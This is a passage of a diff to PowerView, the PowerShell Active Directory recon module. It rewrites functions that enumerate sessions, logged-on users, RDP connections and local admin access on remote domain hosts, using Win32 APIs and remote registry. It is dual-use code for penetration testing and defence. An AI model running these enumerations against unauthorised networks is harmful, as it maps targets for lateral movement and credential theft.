- $EntriesRead = 0 - $TotalRead = 0 - $ResumeHandle = 0 - - # get session information - $Result = $Netapi32::NetSessionEnum($Computer, '', $UserName, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle) - - # Locate the offset of the initial intPtr - $Offset = $PtrInfo.ToInt64() - - # 0 = success - if (($Result -eq 0) -and ($Offset -gt 0)) { - - # Work out how much to increment the pointer by finding out the size of the structure - $Increment = $SESSION_INFO_10::GetSize() - - # parse all the result structures - for ($i = 0; ($i -lt $EntriesRead); $i++) { - # create a new int ptr at the given offset and cast the pointer as our result structure - $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset - $Info = $NewIntPtr -as $SESSION_INFO_10 - - # return all the sections of the structure - $Sessions = $Info | Select-Object * - $Sessions | Add-Member Noteproperty 'ComputerName' $Computer - $Offset = $NewIntPtr.ToInt64() - $Offset += $Increment - $Sessions - } - # free up the result buffer - $Null = $Netapi32::NetApiBufferFree($PtrInfo) - } - else { - Write-Verbose "Error: $(([ComponentModel.Win32Exception] $Result).Message)" - } -} +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the remote system using Invoke-UserImpersonation. +.EXAMPLE -filter Get-LoggedOnLocal { -<# - .SYNOPSIS +Get-NetLoggedon + +Returns users actively logged onto the local host. - This function will query the HKU registry values to retrieve the local - logged on users SID and then attempt and reverse it. - Adapted technique from Sysinternal's PSLoggedOn script. Benefit over - using the NetWkstaUserEnum API (Get-NetLoggedon) of less user privileges - required (NetWkstaUserEnum requires remote admin access). +.EXAMPLE - Note: This function requires only domain user rights on the - machine you're enumerating, but remote registry must be enabled. +Get-NetLoggedon -ComputerName sqlserver - Function: Get-LoggedOnLocal - Author: Matt Kelly, @BreakersAll +Returns users actively logged onto the 'sqlserver' host. - .PARAMETER ComputerName +.EXAMPLE - The ComputerName to query for active sessions. +Get-DomainComputer | Get-NetLoggedon - .EXAMPLE +Returns all logged on users for all computers in the domain. - PS C:\> Get-LoggedOnLocal +.EXAMPLE - Returns active sessions on the local host. +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-NetLoggedon -ComputerName sqlserver -Credential $Cred - .EXAMPLE +.OUTPUTS - PS C:\> Get-LoggedOnLocal -ComputerName sqlserver +PowerView.LoggedOnUserInfo - Returns active sessions on the 'sqlserver' host. +A PSCustomObject representing a WKSTA_USER_INFO_1 structure, including +the UserName/LogonDomain/AuthDomains/LogonServer for each user, with the ComputerName added. +.LINK + +http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/ #> + [OutputType('PowerView.LoggedOnUserInfo')] [CmdletBinding()] - param( - [Parameter(ValueFromPipeline=$True)] - [Alias('HostName')] - [Object[]] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] [ValidateNotNullOrEmpty()] - $ComputerName = 'localhost' - ) + [String[]] + $ComputerName = 'localhost', - # process multiple host object types from the pipeline - $ComputerName = Get-NameField -Object $ComputerName + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) - try { - # retrieve HKU remote registry values - $Reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('Users', "$ComputerName") + BEGIN { + if ($PSBoundParameters['Credential']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential + } + } - # sort out bogus sid's like _class - $Reg.GetSubKeyNames() | Where-Object { $_ -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' } | ForEach-Object { - $UserName = Convert-SidToName $_ + PROCESS { + ForEach ($Computer in $ComputerName) { + # declare the reference variables + $QueryLevel = 1 + $PtrInfo = [IntPtr]::Zero + $EntriesRead = 0 + $TotalRead = 0 + $ResumeHandle = 0 + + # get logged on user information + $Result = $Netapi32::NetWkstaUserEnum($Computer, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle) + + # locate the offset of the initial intPtr + $Offset = $PtrInfo.ToInt64() + + # 0 = success + if (($Result -eq 0) -and ($Offset -gt 0)) { + + # work out how much to increment the pointer by finding out the size of the structure + $Increment = $WKSTA_USER_INFO_1::GetSize() + + # parse all the result structures + for ($i = 0; ($i -lt $EntriesRead); $i++) { + # create a new int ptr at the given offset and cast the pointer as our result structure + $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset + $Info = $NewIntPtr -as $WKSTA_USER_INFO_1 + + # return all the sections of the structure - have to do it this way for V2 + $LoggedOn = $Info | Select-Object * + $LoggedOn | Add-Member Noteproperty 'ComputerName' $Computer + $LoggedOn.PSObject.TypeNames.Insert(0, 'PowerView.LoggedOnUserInfo') + $Offset = $NewIntPtr.ToInt64() + $Offset += $Increment + $LoggedOn + } - $Parts = $UserName.Split('\') - $UserDomain = $Null - $UserName = $Parts[-1] - if ($Parts.Length -eq 2) { - $UserDomain = $Parts[0] + # free up the result buffer + $Null = $Netapi32::NetApiBufferFree($PtrInfo) + } + else { + Write-Verbose "[Get-NetLoggedon] Error: $(([ComponentModel.Win32Exception] $Result).Message)" } - - $LocalLoggedOnUser = New-Object PSObject - $LocalLoggedOnUser | Add-Member Noteproperty 'ComputerName' "$ComputerName" - $LocalLoggedOnUser | Add-Member Noteproperty 'UserDomain' $UserDomain - $LocalLoggedOnUser | Add-Member Noteproperty 'UserName' $UserName - $LocalLoggedOnUser | Add-Member Noteproperty 'UserSID' $_ - $LocalLoggedOnUser } } - catch { - Write-Verbose "Error opening remote registry on '$ComputerName'" + + END { + if ($LogonToken) { + Invoke-RevertToSelf -TokenHandle $LogonToken + } } } -filter Get-NetRDPSession { +function Get-NetSession { <# - .SYNOPSIS - - This function will execute the WTSEnumerateSessionsEx and - WTSQuerySessionInformation Win32API calls to query a given - RDP remote service for active sessions and originating IPs. - This is a replacement for qwinsta. +.SYNOPSIS - Note: only members of the Administrators or Account Operators local group - can successfully execute this functionality on a remote target. +Returns session information for the local (or a remote) machine. - .PARAMETER ComputerName +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf - The hostname to query for active RDP sessions. +.DESCRIPTION - .EXAMPLE +This function will execute the NetSessionEnum Win32API call to query +a given host for active sessions. - PS C:\> Get-NetRDPSession +.PARAMETER ComputerName - Returns active RDP/terminal sessions on the local host. +Specifies the hostname to query for sessions (also accepts IP addresses). +Defaults to 'localhost'. - .EXAMPLE +.PARAMETER Credential - PS C:\> Get-NetRDPSession -ComputerName "sqlserver" - - Returns active RDP/terminal sessions on the 'sqlserver' host. - - .EXAMPLE - - PS C:\> Get-NetDomainController | Get-NetRDPSession - - Returns active RDP/terminal sessions on all domain controllers. -#> - - [CmdletBinding()] - param( - [Parameter(ValueFromPipeline=$True)] - [Alias('HostName')] - [Object[]] - [ValidateNotNullOrEmpty()] - $ComputerName = 'localhost' - ) +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the remote system using Invoke-UserImpersonation. - # extract the computer name from whatever object was passed on the pipeline - $Computer = $ComputerName | Get-NameField +.EXAMPLE - # open up a handle to the Remote Desktop Session host - $Handle = $Wtsapi32::WTSOpenServerEx($Computer) +Get-NetSession - # if we get a non-zero handle back, everything was successful - if ($Handle -ne 0) { +Returns active sessions on the local host. - # arguments for WTSEnumerateSessionsEx - $ppSessionInfo = [IntPtr]::Zero - $pCount = 0 - - # get information on all current sessions - $Result = $Wtsapi32::WTSEnumerateSessionsEx($Handle, [ref]1, 0, [ref]$ppSessionInfo, [ref]$pCount);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() +.EXAMPLE - # Locate the offset of the initial intPtr - $Offset = $ppSessionInfo.ToInt64() +Get-NetSession -ComputerName sqlserver - if (($Result -ne 0) -and ($Offset -gt 0)) { +Returns active sessions on the 'sqlserver' host. - # Work out how much to increment the pointer by finding out the size of the structure - $Increment = $WTS_SESSION_INFO_1::GetSize() +.EXAMPLE - # parse all the result structures - for ($i = 0; ($i -lt $pCount); $i++) { - - # create a new int ptr at the given offset and cast the pointer as our result structure - $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset - $Info = $NewIntPtr -as $WTS_SESSION_INFO_1 +Get-DomainController | Get-NetSession - $RDPSession = New-Object PSObject +Returns active sessions on all domain controllers. - if ($Info.pHostName) { - $RDPSession | Add-Member Noteproperty 'ComputerName' $Info.pHostName - } - else { - # if no hostname returned, use the specified hostname - $RDPSession | Add-Member Noteproperty 'ComputerName' $Computer - } +.EXAMPLE - $RDPSession | Add-Member Noteproperty 'SessionName' $Info.pSessionName +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-NetSession -ComputerName sqlserver -Credential $Cred - if ($(-not $Info.pDomainName) -or ($Info.pDomainName -eq '')) { - # if a domain isn't returned just use the username - $RDPSession | Add-Member Noteproperty 'UserName' "$($Info.pUserName)" - } - else { - $RDPSession | Add-Member Noteproperty 'UserName' "$($Info.pDomainName)\$($Info.pUserName)" - } +.OUTPUTS - $RDPSession | Add-Member Noteproperty 'ID' $Info.SessionID - $RDPSession | Add-Member Noteproperty 'State' $Info.State +PowerView.SessionInfo - $ppBuffer = [IntPtr]::Zero - $pBytesReturned = 0 +A PSCustomObject representing a WKSTA_USER_INFO_1 structure, including +the CName/UserName/Time/IdleTime for each session, with the ComputerName added. - # query for the source client IP with WTSQuerySessionInformation - # https://msdn.microsoft.com/en-us/library/aa383861(v=vs.85).aspx - $Result2 = $Wtsapi32::WTSQuerySessionInformation($Handle, $Info.SessionID, 14, [ref]$ppBuffer, [ref]$pBytesReturned);$LastError2 = [Runtime.InteropServices.Marshal]::GetLastWin32Error() +.LINK - if($Result -eq 0) { - Write-Verbose "Error: $(([ComponentModel.Win32Exception] $LastError2).Message)" - } - else { - $Offset2 = $ppBuffer.ToInt64() - $NewIntPtr2 = New-Object System.Intptr -ArgumentList $Offset2 - $Info2 = $NewIntPtr2 -as $WTS_CLIENT_ADDRESS +http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/ +#> - $SourceIP = $Info2.Address - if($SourceIP[2] -ne 0) { - $SourceIP = [String]$SourceIP[2]+"."+[String]$SourceIP[3]+"."+[String]$SourceIP[4]+"."+[String]$SourceIP[5] - } - else { - $SourceIP = $Null - } + [OutputType('PowerView.SessionInfo')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName = 'localhost', - $RDPSession | Add-Member Noteproperty 'SourceIP' $SourceIP - $RDPSession + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) - # free up the memory buffer - $Null = $Wtsapi32::WTSFreeMemory($ppBuffer) + BEGIN { + if ($PSBoundParameters['Credential']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential + } + } + PROCESS { + ForEach ($Computer in $ComputerName) { + # arguments for NetSessionEnum + $QueryLevel = 10 + $PtrInfo = [IntPtr]::Zero + $EntriesRead = 0 + $TotalRead = 0 + $ResumeHandle = 0 + + # get session information + $Result = $Netapi32::NetSessionEnum($Computer, '', $UserName, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle) + + # locate the offset of the initial intPtr + $Offset = $PtrInfo.ToInt64() + + # 0 = success + if (($Result -eq 0) -and ($Offset -gt 0)) { + + # work out how much to increment the pointer by finding out the size of the structure + $Increment = $SESSION_INFO_10::GetSize() + + # parse all the result structures + for ($i = 0; ($i -lt $EntriesRead); $i++) { + # create a new int ptr at the given offset and cast the pointer as our result structure + $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset + $Info = $NewIntPtr -as $SESSION_INFO_10 + + # return all the sections of the structure - have to do it this way for V2 + $Session = $Info | Select-Object * + $Session | Add-Member Noteproperty 'ComputerName' $Computer + $Session.PSObject.TypeNames.Insert(0, 'PowerView.SessionInfo') + $Offset = $NewIntPtr.ToInt64() $Offset += $Increment + $Session } + + # free up the result buffer + $Null = $Netapi32::NetApiBufferFree($PtrInfo) + } + else { + Write-Verbose "[Get-NetSession] Error: $(([ComponentModel.Win32Exception] $Result).Message)" } - # free up the memory result buffer - $Null = $Wtsapi32::WTSFreeMemoryEx(2, $ppSessionInfo, $pCount) - } - else { - Write-Verbose "Error: $(([ComponentModel.Win32Exception] $LastError).Message)" } - # Close off the service handle - $Null = $Wtsapi32::WTSCloseServer($Handle) } - else { - Write-Verbose "Error opening the Remote Desktop Session Host (RD Session Host) server for: $ComputerName" + + + END { + if ($LogonToken) { + Invoke-RevertToSelf -TokenHandle $LogonToken + } } } -filter Invoke-CheckLocalAdminAccess { +function Get-RegLoggedOn { <# - .SYNOPSIS - - This function will use the OpenSCManagerW Win32API call to establish - a handle to the remote host. If this succeeds, the current user context - has local administrator acess to the target. - - Idea stolen from the local_admin_search_enum post module in Metasploit written by: - 'Brandon McCann "zeknox" ' - 'Thomas McCarthy "smilingraccoon" ' - 'Royce Davis "r3dy" ' - - .PARAMETER ComputerName - - The hostname to query for active sessions. - - .OUTPUTS - - $True if the current user has local admin access to the hostname, $False otherwise +.SYNOPSIS - .EXAMPLE +Returns who is logged onto the local (or a remote) machine +through enumeration of remote registry keys. - PS C:\> Invoke-CheckLocalAdminAccess -ComputerName sqlserver +Note: This function requires only domain user rights on the +machine you're enumerating, but remote registry must be enabled. - Returns active sessions on the local host. +Author: Matt Kelly (@BreakersAll) +License: BSD 3-Clause +Required Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf, ConvertFrom-SID - .EXAMPLE +.DESCRIPTION - PS C:\> Get-NetComputer | Invoke-CheckLocalAdminAccess +This function will query the HKU registry values to retrieve the local +logged on users SID and then attempt and reverse it. +Adapted technique from Sysinternal's PSLoggedOn script. Benefit over +using the NetWkstaUserEnum API (Get-NetLoggedon) of less user privileges +required (NetWkstaUserEnum requires remote admin access). - Sees what machines in the domain the current user has access to. - - .LINK - - https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/local_admin_search_enum.rb - http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/ -#> - - [CmdletBinding()] - param( - [Parameter(ValueFromPipeline=$True)] - [Alias('HostName')] - [Object[]] - [ValidateNotNullOrEmpty()] - $ComputerName = 'localhost' - ) +.PARAMETER ComputerName - # extract the computer name from whatever object was passed on the pipeline - $Computer = $ComputerName | Get-NameField +Specifies the hostname to query for remote registry values (also accepts IP addresses). +Defaults to 'localhost'. - # 0xF003F - SC_MANAGER_ALL_ACCESS - # http://msdn.microsoft.com/en-us/library/windows/desktop/ms685981(v=vs.85).aspx - $Handle = $Advapi32::OpenSCManagerW("\\$Computer", 'ServicesActive', 0xF003F);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() +.PARAMETER Credential - Write-Verbose "Invoke-CheckLocalAdminAccess handle: $Handle" +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the remote system using Invoke-UserImpersonation. - $IsAdmin = New-Object PSObject - $IsAdmin | Add-Member Noteproperty 'ComputerName' $Computer +.EXAMPLE - # if we get a non-zero handle back, everything was successful - if ($Handle -ne 0) { - $Null = $Advapi32::CloseServiceHandle($Handle) - $IsAdmin | Add-Member Noteproperty 'IsAdmin' $True - } - else { - Write-Verbose "Error: $(([ComponentModel.Win32Exception] $LastError).Message)" - $IsAdmin | Add-Member Noteproperty 'IsAdmin' $False - } +Get-RegLoggedOn - $IsAdmin -} +Returns users actively logged onto the local host. +.EXAMPLE -filter Get-SiteName { -<# - .SYNOPSIS +Get-RegLoggedOn -ComputerName sqlserver - This function will use the DsGetSiteName Win32API call to look up the - name of the site where a specified computer resides. +Returns users actively logged onto the 'sqlserver' host. - .PARAMETER ComputerName +.EXAMPLE - The hostname to look the site up for, default to localhost. +Get-DomainController | Get-RegLoggedOn - .EXAMPLE +Returns users actively logged on all domain controllers. - PS C:\> Get-SiteName -ComputerName WINDOWS1 +.EXAMPLE - Returns the site for WINDOWS1.testlab.local. +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-RegLoggedOn -ComputerName sqlserver -Credential $Cred - .EXAMPLE +.OUTPUTS - PS C:\> Get-NetComputer | Get-SiteName +PowerView.RegLoggedOnUser - Returns the sites for every machine in AD. +A PSCustomObject including the UserDomain/UserName/UserSID of each +actively logged on user, with the ComputerName added. #> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.RegLoggedOnUser')] [CmdletBinding()] - param( - [Parameter(ValueFromPipeline=$True)] - [Alias('HostName')] - [Object[]] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] [ValidateNotNullOrEmpty()] - $ComputerName = $Env:ComputerName + [String[]] + $ComputerName = 'localhost' ) - # extract the computer name from whatever object was passed on the pipeline - $Computer = $ComputerName | Get-NameField - - # if we get an IP address, try to resolve the IP to a hostname - if($Computer -match '^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$') { - $IPAddress = $Computer - $Computer = [System.Net.Dns]::GetHostByAddress($Computer) - } - else { - $IPAddress = @(Get-IPAddress -ComputerName $Computer)[0].IPAddress + BEGIN { + if ($PSBoundParameters['Credential']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential + } } - $PtrInfo = [IntPtr]::Zero + PROCESS { + ForEach ($Computer in $ComputerName) { + try { + # retrieve HKU remote registry values + $Reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('Users', "$ComputerName") - $Result = $Netapi32::DsGetSiteName($Computer, [ref]$PtrInfo) + # sort out bogus sid's like _class + $Reg.GetSubKeyNames() | Where-Object { $_ -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' } | ForEach-Object { + $UserName = ConvertFrom-SID -ObjectSID $_ -OutputType 'DomainSimple' - $ComputerSite = New-Object PSObject - $ComputerSite | Add-Member Noteproperty 'ComputerName' $Computer - $ComputerSite | Add-Member Noteproperty 'IPAddress' $IPAddress + if ($UserName) { + $UserName, $UserDomain = $UserName.Split('@') + } + else { + $UserName = $_ + $UserDomain = $Null + } - if ($Result -eq 0) { - $Sitename = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($PtrInfo) - $ComputerSite | Add-Member Noteproperty 'SiteName' $Sitename - } - else { - $ErrorMessage = "Error: $(([ComponentModel.Win32Exception] $Result).Message)" - $ComputerSite | Add-Member Noteproperty 'SiteName' $ErrorMessage + $RegLoggedOnUser = New-Object PSObject + $RegLoggedOnUser | Add-Member Noteproperty 'ComputerName' "$ComputerName" + $RegLoggedOnUser | Add-Member Noteproperty 'UserDomain' $UserDomain + $RegLoggedOnUser | Add-Member Noteproperty 'UserName' $UserName + $RegLoggedOnUser | Add-Member Noteproperty 'UserSID' $_ + $RegLoggedOnUser.PSObject.TypeNames.Insert(0, 'PowerView.RegLoggedOnUser') + $RegLoggedOnUser + } + } + catch { + Write-Verbose "[Get-RegLoggedOn] Error opening remote registry on '$ComputerName' : $_" + } + } } - $Null = $Netapi32::NetApiBufferFree($PtrInfo) - - $ComputerSite + END { + if ($LogonToken) { + Invoke-RevertToSelf -TokenHandle $LogonToken + } + } } -filter Get-LastLoggedOn { +function Get-NetRDPSession { <# - .SYNOPSIS +.SYNOPSIS - This function uses remote registry functionality to return - the last user logged onto a target machine. +Returns remote desktop/session information for the local (or a remote) machine. - Note: This function requires administrative rights on the - machine you're enumerating. +Note: only members of the Administrators or Account Operators local group +can successfully execute this functionality on a remote target. - .PARAMETER ComputerName +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf - The hostname to query for the last logged on user. - Defaults to the localhost. +.DESCRIPTION - .PARAMETER Credential +This function will execute the WTSEnumerateSessionsEx and WTSQuerySessionInformation +Win32API calls to query a given RDP remote service for active sessions and originating +IPs. This is a replacement for qwinsta. - A [Management.Automation.PSCredential] object for the remote connection. +.PARAMETER ComputerName - .EXAMPLE +Specifies the hostname to query for active sessions (also accepts IP addresses). +Defaults to 'localhost'. - PS C:\> Get-LastLoggedOn +.PARAMETER Credential - Returns the last user logged onto the local machine. +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the remote system using Invoke-UserImpersonation. - .EXAMPLE - - PS C:\> Get-LastLoggedOn -ComputerName WINDOWS1 +.EXAMPLE - Returns the last user logged onto WINDOWS1 +Get-NetRDPSession - .EXAMPLE - - PS C:\> Get-NetComputer | Get-LastLoggedOn - - Returns the last user logged onto all machines in the domain. -#> +Returns active RDP/terminal sessions on the local host. - [CmdletBinding()] - param( - [Parameter(ValueFromPipeline=$True)] - [Alias('HostName')] - [Object[]] - [ValidateNotNullOrEmpty()] - $ComputerName = 'localhost', +.EXAMPLE - [Management.Automation.PSCredential] - $Credential - ) +Get-NetRDPSession -ComputerName "sqlserver" - # extract the computer name from whatever object was passed on the pipeline - $Computer = $ComputerName | Get-NameField +Returns active RDP/terminal sessions on the 'sqlserver' host. - # HKEY_LOCAL_MACHINE - $HKLM = 2147483650 +.EXAMPLE - # try to open up the remote registry key to grab the last logged on user - try { +Get-DomainController | Get-NetRDPSession - if($Credential) { - $Reg = Get-WmiObject -List 'StdRegProv' -Namespace root\default -Computername $Computer -Credential $Credential -ErrorAction SilentlyContinue - } - else { - $Reg = Get-WmiObject -List 'StdRegProv' -Namespace root\default -Computername $Computer -ErrorAction SilentlyContinue - } +Returns active RDP/terminal sessions on all domain controllers. - $Key = "SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI" - $Value = "LastLoggedOnUser" - $LastUser = $Reg.GetStringValue($HKLM, $Key, $Value).sValue +.EXAMPLE - $LastLoggedOn = New-Object PSObject - $LastLoggedOn | Add-Member Noteproperty 'ComputerName' $Computer - $LastLoggedOn | Add-Member Noteproperty 'LastLoggedOn' $LastUser - $LastLoggedOn - } - catch { - Write-Warning "[!] Error opening remote registry on $Computer. Remote registry likely not enabled." - } -} +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-NetRDPSession -ComputerName sqlserver -Credential $Cred +.OUTPUTS -filter Get-CachedRDPConnection { -<# - .SYNOPSIS +PowerView.RDPSessionInfo - Uses remote registry functionality to query all entries for the - "Windows Remote Desktop Connection Client" on a machine, separated by - user and target server. +A PSCustomObject representing a combined WTS_SESSION_INFO_1 and WTS_CLIENT_ADDRESS structure, +with the ComputerName added. - Note: This function requires administrative rights on the - machine you're enumerating. +.LINK - .PARAMETER ComputerName +https://msdn.microsoft.com/en-us/library/aa383861(v=vs.85).aspx +#> - The hostname to query for RDP client information. - Defaults to localhost. + [OutputType('PowerView.RDPSessionInfo')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName = 'localhost', - .PARAMETER Credential + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) - A [Management.Automation.PSCredential] object for the remote connection. + BEGIN { + if ($PSBoundParameters['Credential']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential + } + } - .EXAMPLE + PROCESS { + ForEach ($Computer in $ComputerName) { - PS C:\> Get-CachedRDPConnection + # open up a handle to the Remote Desktop Session host + $Handle = $Wtsapi32::WTSOpenServerEx($Computer) - Returns the RDP connection client information for the local machine. + # if we get a non-zero handle back, everything was successful + if ($Handle -ne 0) { - .EXAMPLE + # arguments for WTSEnumerateSessionsEx + $ppSessionInfo = [IntPtr]::Zero + $pCount = 0 - PS C:\> Get-CachedRDPConnection -ComputerName WINDOWS2.testlab.local + # get information on all current sessions + $Result = $Wtsapi32::WTSEnumerateSessionsEx($Handle, [ref]1, 0, [ref]$ppSessionInfo, [ref]$pCount);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() - Returns the RDP connection client information for the WINDOWS2.testlab.local machine + # locate the offset of the initial intPtr + $Offset = $ppSessionInfo.ToInt64() - .EXAMPLE + if (($Result -ne 0) -and ($Offset -gt 0)) { - PS C:\> Get-CachedRDPConnection -ComputerName WINDOWS2.testlab.local -Credential $Cred + # work out how much to increment the pointer by finding out the size of the structure + $Increment = $WTS_SESSION_INFO_1::GetSize() - Returns the RDP connection client information for the WINDOWS2.testlab.local machine using alternate credentials. + # parse all the result structures + for ($i = 0; ($i -lt $pCount); $i++) { - .EXAMPLE + # create a new int ptr at the given offset and cast the pointer as our result structure + $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset + $Info = $NewIntPtr -as $WTS_SESSION_INFO_1 - PS C:\> Get-NetComputer | Get-CachedRDPConnection + $RDPSession = New-Object PSObject - Get cached RDP information for all machines in the domain. -#> + if ($Info.pHostName) { + $RDPSession | Add-Member Noteproperty 'ComputerName' $Info.pHostName + } + else { + # if no hostname returned, use the specified hostname + $RDPSession | Add-Member Noteproperty 'ComputerName' $Computer + } - [CmdletBinding()] - param( - [Parameter(ValueFromPipeline=$True)] - [Alias('HostName')] - [Object[]] - [ValidateNotNullOrEmpty()] - $ComputerName = 'localhost', + $RDPSession | Add-Member Noteproperty 'SessionName' $Info.pSessionName - [Management.Automation.PSCredential] - $Credential - ) + if ($(-not $Info.pDomainName) -or ($Info.pDomainName -eq '')) { + # if a domain isn't returned just use the username + $RDPSession | Add-Member Noteproperty 'UserName' "$($Info.pUserName)" + } + else { + $RDPSession | Add-Member Noteproperty 'UserName' "$($Info.pDomainName)\$($Info.pUserName)" + } - # extract the computer name from whatever object was passed on the pipeline - $Computer = $ComputerName | Get-NameField + $RDPSession | Add-Member Noteproperty 'ID' $Info.SessionID + $RDPSession | Add-Member Noteproperty 'State' $Info.State - # HKEY_USERS - $HKU = 2147483651 + $ppBuffer = [IntPtr]::Zero + $pBytesReturned = 0 - try { - if($Credential) { - $Reg = Get-WmiObject -List 'StdRegProv' -Namespace root\default -Computername $Computer -Credential $Credential -ErrorAction SilentlyContinue - } - else { - $Reg = Get-WmiObject -List 'StdRegProv' -Namespace root\default -Computername $Computer -ErrorAction SilentlyContinue - } + # query for the source client IP with WTSQuerySessionInformation + # https://msdn.microsoft.com/en-us/library/aa383861(v=vs.85).aspx + $Result2 = $Wtsapi32::WTSQuerySessionInformation($Handle, $Info.SessionID, 14, [ref]$ppBuffer, [ref]$pBytesReturned);$LastError2 = [Runtime.InteropServices.Marshal]::GetLastWin32Error() - # extract out the SIDs of domain users in this hive - $UserSIDs = ($Reg.EnumKey($HKU, "")).sNames | ? { $_ -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' } + if ($Result2 -eq 0) { + Write-Verbose "[Get-NetRDPSession] Error: $(([ComponentModel.Win32Exception] $LastError2).Message)" + } + else { + $Offset2 = $ppBuffer.ToInt64() + $NewIntPtr2 = New-Object System.Intptr -ArgumentList $Offset2 + $Info2 = $NewIntPtr2 -as $WTS_CLIENT_ADDRESS - foreach ($UserSID in $UserSIDs) { + $SourceIP = $Info2.Address + if ($SourceIP[2] -ne 0) { + $SourceIP = [String]$SourceIP[2]+'.'+[String]$SourceIP[3]+'.'+[String]$SourceIP[4]+'.'+[String]$SourceIP[5] + } + else { + $SourceIP = $Null + } - try { - $UserName = Convert-SidToName $UserSID + $RDPSession | Add-Member Noteproperty 'SourceIP' $SourceIP + $RDPSession.PSObject.TypeNames.Insert(0, 'PowerView.RDPSessionInfo') + $RDPSession - # pull out all the cached RDP connections - $ConnectionKeys = $Reg.EnumValues($HKU,"$UserSID\Software\Microsoft\Terminal Server Client\Default").sNames + # free up the memory buffer + $Null = $Wtsapi32::WTSFreeMemory($ppBuffer) - foreach ($Connection in $ConnectionKeys) { - # make sure this key is a cached connection - if($Connection -match 'MRU.*') { - $TargetServer = $Reg.GetStringValue($HKU, "$UserSID\Software\Microsoft\Terminal Server Client\Default", $Connection).sValue - - $FoundConnection = New-Object PSObject - $FoundConnection | Add-Member Noteproperty 'ComputerName' $Computer - $FoundConnection | Add-Member Noteproperty 'UserName' $UserName - $FoundConnection | Add-Member Noteproperty 'UserSID' $UserSID - $FoundConnection | Add-Member Noteproperty 'TargetServer' $TargetServer - $FoundConnection | Add-Member Noteproperty 'UsernameHint' $Null - $FoundConnection + $Offset += $Increment + } } + # free up the memory result buffer + $Null = $Wtsapi32::WTSFreeMemoryEx(2, $ppSessionInfo, $pCount) } - - # pull out all the cached server info with username hints - $ServerKeys = $Reg.EnumKey($HKU,"$UserSID\Software\Microsoft\Terminal Server Client\Servers").sNames - - foreach ($Server in $ServerKeys) { - - $UsernameHint = $Reg.GetStringValue($HKU, "$UserSID\Software\Microsoft\Terminal Server Client\Servers\$Server", 'UsernameHint').sValue - - $FoundConnection = New-Object PSObject - $FoundConnection | Add-Member Noteproperty 'ComputerName' $Computer - $FoundConnection | Add-Member Noteproperty 'UserName' $UserName - $FoundConnection | Add-Member Noteproperty 'UserSID' $UserSID - $FoundConnection | Add-Member Noteproperty 